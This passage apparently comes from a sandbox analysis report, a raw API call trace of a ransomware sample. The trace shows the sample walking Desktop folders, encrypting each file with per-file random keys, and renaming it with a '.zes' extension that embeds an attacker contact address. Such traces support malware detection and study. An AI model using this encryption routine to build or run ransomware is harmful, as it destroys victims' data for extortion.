returned 1 [0134.355] CryptDestroyKey (hKey=0x53a568) returned 1 [0134.355] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x9654, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.355] SetEndOfFile (hFile=0x124) returned 1 [0134.357] GetProcessHeap () returned 0x520000 [0134.357] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x535588 | out: hHeap=0x520000) returned 1 [0134.357] GetProcessHeap () returned 0x520000 [0134.357] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x544b60 | out: hHeap=0x520000) returned 1 [0134.357] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\W83hY-ueVY.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\w83hy-uevy.wav"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\W83hY-ueVY.wav.[4B2E4630].[johncastle@msgsafe.io].zes" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\w83hy-uevy.wav.[4b2e4630].[johncastle@msgsafe.io].zes")) returned 1 [0134.361] CloseHandle (hObject=0x124) returned 1 [0134.361] WaitForSingleObject (hHandle=0x118, dwMilliseconds=0x0) returned 0x102 [0134.361] FindNextFileW (in: hFindFile=0x544b08, lpFindFileData=0x23ffd20 | out: lpFindFileData=0x23ffd20*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x32e6c60, ftCreationTime.dwHighDateTime=0x1d5e694, ftLastAccessTime.dwLowDateTime=0x59aa4e70, ftLastAccessTime.dwHighDateTime=0x1d5e242, ftLastWriteTime.dwLowDateTime=0x59aa4e70, ftLastWriteTime.dwHighDateTime=0x1d5e242, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xffff, cFileName="Xgmd_gfDjhMfGMTGlo", cAlternateFileName="XGMD_G~1")) returned 1 [0134.361] WaitForSingleObject (hHandle=0x118, dwMilliseconds=0x0) returned 0x102 [0134.361] GetProcessHeap () returned 0x520000 [0134.361] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x82) returned 0x544ff0 [0134.361] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Xgmd_gfDjhMfGMTGlo\\*.*", lpFindFileData=0x23ffa98 | out: lpFindFileData=0x23ffa98*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x32e6c60, ftCreationTime.dwHighDateTime=0x1d5e694, ftLastAccessTime.dwLowDateTime=0x59aa4e70, ftLastAccessTime.dwHighDateTime=0x1d5e242, ftLastWriteTime.dwLowDateTime=0x59aa4e70, ftLastWriteTime.dwHighDateTime=0x1d5e242, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x520138, dwReserved1=0x77c7387a, cFileName=".", cAlternateFileName="")) returned 0x53a568 [0134.362] GetProcessHeap () returned 0x520000 [0134.362] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x544ff0 | out: hHeap=0x520000) returned 1 [0134.362] FindNextFileW (in: hFindFile=0x53a568, lpFindFileData=0x23ffa98 | out: lpFindFileData=0x23ffa98*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x32e6c60, ftCreationTime.dwHighDateTime=0x1d5e694, ftLastAccessTime.dwLowDateTime=0x59aa4e70, ftLastAccessTime.dwHighDateTime=0x1d5e242, ftLastWriteTime.dwLowDateTime=0x59aa4e70, ftLastWriteTime.dwHighDateTime=0x1d5e242, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x520138, dwReserved1=0x77c7387a, cFileName="..", cAlternateFileName="")) returned 1 [0134.362] FindNextFileW (in: hFindFile=0x53a568, lpFindFileData=0x23ffa98 | out: lpFindFileData=0x23ffa98*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xce941450, ftCreationTime.dwHighDateTime=0x1d5e4cc, ftLastAccessTime.dwLowDateTime=0x60ddc7e0, ftLastAccessTime.dwHighDateTime=0x1d5e1e7, ftLastWriteTime.dwLowDateTime=0x60ddc7e0, ftLastWriteTime.dwHighDateTime=0x1d5e1e7, nFileSizeHigh=0x0, nFileSizeLow=0x16cb0, dwReserved0=0x520138, dwReserved1=0x77c7387a, cFileName="ga 79jQ.csv", cAlternateFileName="GA79JQ~1.CSV")) returned 1 [0134.362] GetProcessHeap () returned 0x520000 [0134.362] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x284) returned 0x569748 [0134.362] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Xgmd_gfDjhMfGMTGlo\\ga 79jQ.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xgmd_gfdjhmfgmtglo\\ga 79jq.csv"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0134.362] GetProcessHeap () returned 0x520000 [0134.362] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x10) returned 0x544b60 [0134.362] CryptGenRandom (in: hProv=0x534c10, dwLen=0x10, pbBuffer=0x544b60 | out: pbBuffer=0x544b60) returned 1 [0134.362] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x23ffa28 | out: lpNewFilePointer=0x0) returned 1 [0134.362] CryptImportKey (in: hProv=0x534c10, pbData=0x544890, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x23ffa0c | out: phKey=0x23ffa0c*=0x53a5f8) returned 1 [0134.362] CryptSetKeyParam (hKey=0x53a5f8, dwParam=0x1, pbData=0x544b60, dwFlags=0x0) returned 1 [0134.362] GetProcessHeap () returned 0x520000 [0134.362] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x40) returned 0x535588 [0134.362] CryptEncrypt (in: hKey=0x53a5f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x535588*, pdwDataLen=0x23ff9f0*=0x40, dwBufLen=0x40 | out: pbData=0x535588*, pdwDataLen=0x23ff9f0*=0x40) returned 1 [0134.362] CryptDestroyKey (hKey=0x53a5f8) returned 1 [0134.363] WriteFile (in: hFile=0x120, lpBuffer=0x535588*, nNumberOfBytesToWrite=0x40, lpNumberOfBytesWritten=0x23ffa08, lpOverlapped=0x0 | out: lpBuffer=0x535588*, lpNumberOfBytesWritten=0x23ffa08*=0x40, lpOverlapped=0x0) returned 1 [0134.363] WriteFile (in: hFile=0x120, lpBuffer=0x23ffa10*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x23ffa08, lpOverlapped=0x0 | out: lpBuffer=0x23ffa10*, lpNumberOfBytesWritten=0x23ffa08*=0x4, lpOverlapped=0x0) returned 1 [0134.363] WriteFile (in: hFile=0x120, lpBuffer=0x544b60*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x23ffa08, lpOverlapped=0x0 | out: lpBuffer=0x544b60*, lpNumberOfBytesWritten=0x23ffa08*=0x10, lpOverlapped=0x0) returned 1 [0134.363] WriteFile (in: hFile=0x120, lpBuffer=0x544990*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x23ffa08, lpOverlapped=0x0 | out: lpBuffer=0x544990*, lpNumberOfBytesWritten=0x23ffa08*=0x80, lpOverlapped=0x0) returned 1 [0134.364] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x23ffa30 | out: lpNewFilePointer=0x0) returned 1 [0134.364] WriteFile (in: hFile=0x120, lpBuffer=0x23ffa20*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x23ffa08, lpOverlapped=0x0 | out: lpBuffer=0x23ffa20*, lpNumberOfBytesWritten=0x23ffa08*=0x8, lpOverlapped=0x0) returned 1 [0134.364] CryptImportKey (in: hProv=0x534c10, pbData=0x544890, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x23ffa0c | out: phKey=0x23ffa0c*=0x53a5f8) returned 1 [0134.364] CryptSetKeyParam (hKey=0x53a5f8, dwParam=0x1, pbData=0x544b60, dwFlags=0x0) returned 1 [0134.364] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.364] ReadFile (in: hFile=0x120, lpBuffer=0x2140020, nNumberOfBytesToRead=0x16cb0, lpNumberOfBytesRead=0x23ffa14, lpOverlapped=0x0 | out: lpBuffer=0x2140020*, lpNumberOfBytesRead=0x23ffa14*=0x16cb0, lpOverlapped=0x0) returned 1 [0134.365] CryptEncrypt (in: hKey=0x53a5f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2140020*, pdwDataLen=0x23ff9f0*=0x16cb0, dwBufLen=0x16cb0 | out: pbData=0x2140020*, pdwDataLen=0x23ff9f0*=0x16cb0) returned 1 [0134.366] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.366] WriteFile (in: hFile=0x120, lpBuffer=0x2140020*, nNumberOfBytesToWrite=0x16cb0, lpNumberOfBytesWritten=0x23ffa08, lpOverlapped=0x0 | out: lpBuffer=0x2140020*, lpNumberOfBytesWritten=0x23ffa08*=0x16cb0, lpOverlapped=0x0) returned 1 [0134.366] CryptDestroyKey (hKey=0x53a5f8) returned 1 [0134.366] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x16d84, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.366] SetEndOfFile (hFile=0x120) returned 1 [0134.372] GetProcessHeap () returned 0x520000 [0134.372] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x535588 | out: hHeap=0x520000) returned 1 [0134.372] GetProcessHeap () returned 0x520000 [0134.372] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x544b60 | out: hHeap=0x520000) returned 1 [0134.372] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Xgmd_gfDjhMfGMTGlo\\ga 79jQ.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xgmd_gfdjhmfgmtglo\\ga 79jq.csv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Xgmd_gfDjhMfGMTGlo\\ga 79jQ.csv.[4B2E4630].[johncastle@msgsafe.io].zes" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xgmd_gfdjhmfgmtglo\\ga 79jq.csv.[4b2e4630].[johncastle@msgsafe.io].zes")) returned 1 [0134.376] CloseHandle (hObject=0x120) returned 1 [0134.376] WaitForSingleObject (hHandle=0x118, dwMilliseconds=0x0) returned 0x102 [0134.376] FindNextFileW (in: hFindFile=0x53a568, lpFindFileData=0x23ffa98 | out: lpFindFileData=0x23ffa98*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3ecb6270, ftCreationTime.dwHighDateTime=0x1d5dc92, ftLastAccessTime.dwLowDateTime=0x10647020, ftLastAccessTime.dwHighDateTime=0x1d5e24b, ftLastWriteTime.dwLowDateTime=0x10647020, ftLastWriteTime.dwHighDateTime=0x1d5e24b, nFileSizeHigh=0x0, nFileSizeLow=0x1a53, dwReserved0=0x520138, dwReserved1=0x77c7387a, cFileName="qfzGN 6xma8CCH8IKS.wav", cAlternateFileName="QFZGN6~1.WAV")) returned 1 [0134.377] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Xgmd_gfDjhMfGMTGlo\\qfzGN 6xma8CCH8IKS.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xgmd_gfdjhmfgmtglo\\qfzgn 6xma8cch8iks.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0134.377] GetProcessHeap () returned 0x520000 [0134.377] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x10) returned 0x544b60 [0134.377] CryptGenRandom (in: hProv=0x534c10, dwLen=0x10, pbBuffer=0x544b60 | out: pbBuffer=0x544b60) returned 1 [0134.377] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x23ffa28 | out: lpNewFilePointer=0x0) returned 1 [0134.377] WriteFile (in: hFile=0x120, lpBuffer=0x23ffa38*, nNumberOfBytesToWrite=0xd, lpNumberOfBytesWritten=0x23ffa08, lpOverlapped=0x0 | out: lpBuffer=0x23ffa38*, lpNumberOfBytesWritten=0x23ffa08*=0xd, lpOverlapped=0x0) returned 1 [0134.378] CryptImportKey (in: hProv=0x534c10, pbData=0x544958, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x23ffa0c | out: phKey=0x23ffa0c*=0x53a5f8) returned 1 [0134.378] CryptSetKeyParam (hKey=0x53a5f8, dwParam=0x1, pbData=0x544b60, dwFlags=0x0) returned 1 [0134.378] GetProcessHeap () returned 0x520000 [0134.378] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x50) returned 0x544aa0 [0134.378] CryptEncrypt (in: hKey=0x53a5f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x544aa0*, pdwDataLen=0x23ff9f0*=0x50, dwBufLen=0x50 | out: pbData=0x544aa0*, pdwDataLen=0x23ff9f0*=0x50) returned 1 [0134.378] CryptDestroyKey (hKey=0x53a5f8) returned 1 [0134.378] WriteFile (in: hFile=0x120, lpBuffer=0x544aa0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x23ffa08, lpOverlapped=0x0 | out: lpBuffer=0x544aa0*, lpNumberOfBytesWritten=0x23ffa08*=0x50, lpOverlapped=0x0) returned 1 [0134.378] WriteFile (in: hFile=0x120, lpBuffer=0x23ffa10*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x23ffa08, lpOverlapped=0x0 | out: lpBuffer=0x23ffa10*, lpNumberOfBytesWritten=0x23ffa08*=0x4, lpOverlapped=0x0) returned 1 [0134.379] WriteFile (in: hFile=0x120, lpBuffer=0x544b60*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x23ffa08, lpOverlapped=0x0 | out: lpBuffer=0x544b60*, lpNumberOfBytesWritten=0x23ffa08*=0x10, lpOverlapped=0x0) returned 1 [0134.379] WriteFile (in: hFile=0x120, lpBuffer=0x544a18*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x23ffa08, lpOverlapped=0x0 | out: lpBuffer=0x544a18*, lpNumberOfBytesWritten=0x23ffa08*=0x80, lpOverlapped=0x0) returned 1 [0134.379] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x23ffa30 | out: lpNewFilePointer=0x0) returned 1 [0134.379] WriteFile (in: hFile=0x120, lpBuffer=0x23ffa20*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x23ffa08, lpOverlapped=0x0 | out: lpBuffer=0x23ffa20*, lpNumberOfBytesWritten=0x23ffa08*=0x8, lpOverlapped=0x0) returned 1 [0134.379] CryptImportKey (in: hProv=0x534c10, pbData=0x544958, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x23ffa0c | out: phKey=0x23ffa0c*=0x53a5f8) returned 1 [0134.379] CryptSetKeyParam (hKey=0x53a5f8, dwParam=0x1, pbData=0x544b60, dwFlags=0x0) returned 1 [0134.379] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.379] ReadFile (in: hFile=0x120, lpBuffer=0x2140020, nNumberOfBytesToRead=0x1a53, lpNumberOfBytesRead=0x23ffa14, lpOverlapped=0x0 | out: lpBuffer=0x2140020*, lpNumberOfBytesRead=0x23ffa14*=0x1a53, lpOverlapped=0x0) returned 1 [0134.379] CryptEncrypt (in: hKey=0x53a5f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2140020*, pdwDataLen=0x23ff9f0*=0x1a60, dwBufLen=0x1a60 | out: pbData=0x2140020*, pdwDataLen=0x23ff9f0*=0x1a60) returned 1 [0134.379] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.379] WriteFile (in: hFile=0x120, lpBuffer=0x2140020*, nNumberOfBytesToWrite=0x1a60, lpNumberOfBytesWritten=0x23ffa08, lpOverlapped=0x0 | out: lpBuffer=0x2140020*, lpNumberOfBytesWritten=0x23ffa08*=0x1a60, lpOverlapped=0x0) returned 1 [0134.380] CryptDestroyKey (hKey=0x53a5f8) returned 1 [0134.380] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x1b44, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.380] SetEndOfFile (hFile=0x120) returned 1 [0134.382] GetProcessHeap () returned 0x520000 [0134.382] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x544aa0 | out: hHeap=0x520000) returned 1 [0134.382] GetProcessHeap () returned 0x520000 [0134.382] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x544b60 | out: hHeap=0x520000) returned 1 [0134.382] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Xgmd_gfDjhMfGMTGlo\\qfzGN 6xma8CCH8IKS.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xgmd_gfdjhmfgmtglo\\qfzgn 6xma8cch8iks.wav"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Xgmd_gfDjhMfGMTGlo\\qfzGN 6xma8CCH8IKS.wav.[4B2E4630].[johncastle@msgsafe.io].zes" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xgmd_gfdjhmfgmtglo\\qfzgn 6xma8cch8iks.wav.[4b2e4630].[johncastle@msgsafe.io].zes")) returned 1 [0134.384] CloseHandle (hObject=0x120) returned 1 [0134.386] WaitForSingleObject (hHandle=0x118, dwMilliseconds=0x0) returned 0x102 [0134.386] FindNextFileW (in: hFindFile=0x53a568, lpFindFileData=0x23ffa98 | out: lpFindFileData=0x23ffa98*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xea2700e0, ftCreationTime.dwHighDateTime=0x1d5d9cf, ftLastAccessTime.dwLowDateTime=0x546c7bb0, ftLastAccessTime.dwHighDateTime=0x1d5e5d8, ftLastWriteTime.dwLowDateTime=0x546c7bb0, ftLastWriteTime.dwHighDateTime=0x1d5e5d8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x520138, dwReserved1=0x77c7387a, cFileName="sGnbgw8s2gTrD4", cAlternateFileName="SGNBGW~1")) returned 1 [0134.387] WaitForSingleObject (hHandle=0x118, dwMilliseconds=0x0) returned 0x102 [0134.387] GetProcessHeap () returned 0x520000 [0134.387] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa0) returned 0x5462f0 [0134.387] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Xgmd_gfDjhMfGMTGlo\\sGnbgw8s2gTrD4\\*.*", lpFindFileData=0x23ff810 | out: lpFindFileData=0x23ff810*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xea2700e0, ftCreationTime.dwHighDateTime=0x1d5d9cf, ftLastAccessTime.dwLowDateTime=0x546c7bb0, ftLastAccessTime.dwHighDateTime=0x1d5e5d8, ftLastWriteTime.dwLowDateTime=0x546c7bb0, ftLastWriteTime.dwHighDateTime=0x1d5e5d8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x520138, dwReserved1=0x77c7387a, cFileName=".", cAlternateFileName="")) returned 0x53a5f8 [0134.387] GetProcessHeap () returned 0x520000 [0134.387] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x5462f0 | out: hHeap=0x520000) returned 1 [0134.387] FindNextFileW (in: hFindFile=0x53a5f8, lpFindFileData=0x23ff810 | out: lpFindFileData=0x23ff810*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xea2700e0, ftCreationTime.dwHighDateTime=0x1d5d9cf, ftLastAccessTime.dwLowDateTime=0x546c7bb0, ftLastAccessTime.dwHighDateTime=0x1d5e5d8, ftLastWriteTime.dwLowDateTime=0x546c7bb0, ftLastWriteTime.dwHighDateTime=0x1d5e5d8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x520138, dwReserved1=0x77c7387a, cFileName="..", cAlternateFileName="")) returned 1 [0134.387] FindNextFileW (in: hFindFile=0x53a5f8, lpFindFileData=0x23ff810 | out: lpFindFileData=0x23ff810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4b9c720, ftCreationTime.dwHighDateTime=0x1d5e0f0, ftLastAccessTime.dwLowDateTime=0x567cfe70, ftLastAccessTime.dwHighDateTime=0x1d5d99e, ftLastWriteTime.dwLowDateTime=0x567cfe70, ftLastWriteTime.dwHighDateTime=0x1d5d99e, nFileSizeHigh=0x0, nFileSizeLow=0xe081, dwReserved0=0x520138, dwReserved1=0x77c7387a, cFileName="6R1trGA_1jq.wav", cAlternateFileName="6R1TRG~1.WAV")) returned 1 [0134.387] GetProcessHeap () returned 0x520000 [0134.387] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x2a2) returned 0x56a9e0 [0134.387] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Xgmd_gfDjhMfGMTGlo\\sGnbgw8s2gTrD4\\6R1trGA_1jq.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xgmd_gfdjhmfgmtglo\\sgnbgw8s2gtrd4\\6r1trga_1jq.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x134 [0134.387] GetProcessHeap () returned 0x520000 [0134.387] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x10) returned 0x544b60 [0134.388] CryptGenRandom (in: hProv=0x534c10, dwLen=0x10, pbBuffer=0x544b60 | out: pbBuffer=0x544b60) returned 1 [0134.388] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x23ff7a0 | out: lpNewFilePointer=0x0) returned 1 [0134.388] WriteFile (in: hFile=0x134, lpBuffer=0x23ff7b0*, nNumberOfBytesToWrite=0xf, lpNumberOfBytesWritten=0x23ff780, lpOverlapped=0x0 | out: lpBuffer=0x23ff7b0*, lpNumberOfBytesWritten=0x23ff780*=0xf, lpOverlapped=0x0) returned 1 [0134.389] CryptImportKey (in: hProv=0x534c10, pbData=0x544890, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x23ff784 | out: phKey=0x23ff784*=0x544aa0) returned 1 [0134.389] CryptSetKeyParam (hKey=0x544aa0, dwParam=0x1, pbData=0x544b60, dwFlags=0x0) returned 1 [0134.389] GetProcessHeap () returned 0x520000 [0134.389] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x40) returned 0x535588 [0134.389] CryptEncrypt (in: hKey=0x544aa0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x535588*, pdwDataLen=0x23ff768*=0x40, dwBufLen=0x40 | out: pbData=0x535588*, pdwDataLen=0x23ff768*=0x40) returned 1 [0134.389] CryptDestroyKey (hKey=0x544aa0) returned 1 [0134.389] WriteFile (in: hFile=0x134, lpBuffer=0x535588*, nNumberOfBytesToWrite=0x40, lpNumberOfBytesWritten=0x23ff780, lpOverlapped=0x0 | out: lpBuffer=0x535588*, lpNumberOfBytesWritten=0x23ff780*=0x40, lpOverlapped=0x0) returned 1 [0134.389] WriteFile (in: hFile=0x134, lpBuffer=0x23ff788*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x23ff780, lpOverlapped=0x0 | out: lpBuffer=0x23ff788*, lpNumberOfBytesWritten=0x23ff780*=0x4, lpOverlapped=0x0) returned 1 [0134.389] WriteFile (in: hFile=0x134, lpBuffer=0x544b60*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x23ff780, lpOverlapped=0x0 | out: lpBuffer=0x544b60*, lpNumberOfBytesWritten=0x23ff780*=0x10, lpOverlapped=0x0) returned 1 [0134.389] WriteFile (in: hFile=0x134, lpBuffer=0x544990*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x23ff780, lpOverlapped=0x0 | out: lpBuffer=0x544990*, lpNumberOfBytesWritten=0x23ff780*=0x80, lpOverlapped=0x0) returned 1 [0134.389] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x23ff7a8 | out: lpNewFilePointer=0x0) returned 1 [0134.390] WriteFile (in: hFile=0x134, lpBuffer=0x23ff798*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x23ff780, lpOverlapped=0x0 | out: lpBuffer=0x23ff798*, lpNumberOfBytesWritten=0x23ff780*=0x8, lpOverlapped=0x0) returned 1 [0134.390] CryptImportKey (in: hProv=0x534c10, pbData=0x544890, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x23ff784 | out: phKey=0x23ff784*=0x546448) returned 1 [0134.390] CryptSetKeyParam (hKey=0x546448, dwParam=0x1, pbData=0x544b60, dwFlags=0x0) returned 1 [0134.390] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.390] ReadFile (in: hFile=0x134, lpBuffer=0x2140020, nNumberOfBytesToRead=0xe081, lpNumberOfBytesRead=0x23ff78c, lpOverlapped=0x0 | out: lpBuffer=0x2140020*, lpNumberOfBytesRead=0x23ff78c*=0xe081, lpOverlapped=0x0) returned 1 [0134.390] CryptEncrypt (in: hKey=0x546448, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2140020*, pdwDataLen=0x23ff768*=0xe090, dwBufLen=0xe090 | out: pbData=0x2140020*, pdwDataLen=0x23ff768*=0xe090) returned 1 [0134.391] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.391] WriteFile (in: hFile=0x134, lpBuffer=0x2140020*, nNumberOfBytesToWrite=0xe090, lpNumberOfBytesWritten=0x23ff780, lpOverlapped=0x0 | out: lpBuffer=0x2140020*, lpNumberOfBytesWritten=0x23ff780*=0xe090, lpOverlapped=0x0) returned 1 [0134.391] CryptDestroyKey (hKey=0x546448) returned 1 [0134.392] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0xe164, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.392] SetEndOfFile (hFile=0x134) returned 1 [0134.395] GetProcessHeap () returned 0x520000 [0134.395] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x535588 | out: hHeap=0x520000) returned 1 [0134.395] GetProcessHeap () returned 0x520000 [0134.395] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x544b60 | out: hHeap=0x520000) returned 1 [0134.395] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Xgmd_gfDjhMfGMTGlo\\sGnbgw8s2gTrD4\\6R1trGA_1jq.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xgmd_gfdjhmfgmtglo\\sgnbgw8s2gtrd4\\6r1trga_1jq.wav"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Xgmd_gfDjhMfGMTGlo\\sGnbgw8s2gTrD4\\6R1trGA_1jq.wav.[4B2E4630].[johncastle@msgsafe.io].zes" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xgmd_gfdjhmfgmtglo\\sgnbgw8s2gtrd4\\6r1trga_1jq.wav.[4b2e4630].[johncastle@msgsafe.io].zes")) returned 1 [0134.400] CloseHandle (hObject=0x134) returned 1 [0134.400] WaitForSingleObject (hHandle=0x118, dwMilliseconds=0x0) returned 0x102 [0134.401] FindNextFileW (in: hFindFile=0x53a5f8, lpFindFileData=0x23ff810 | out: lpFindFileData=0x23ff810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x827035a0, ftCreationTime.dwHighDateTime=0x1d5e25f, ftLastAccessTime.dwLowDateTime=0x1e9314b0, ftLastAccessTime.dwHighDateTime=0x1d5dfc3, ftLastWriteTime.dwLowDateTime=0x1e9314b0, ftLastWriteTime.dwHighDateTime=0x1d5dfc3, nFileSizeHigh=0x0, nFileSizeLow=0x17dc3, dwReserved0=0x520138, dwReserved1=0x77c7387a, cFileName="mGYbl5LMqWWKr.gif", cAlternateFileName="MGYBL5~1.GIF")) returned 1 [0134.401] CreateFileW 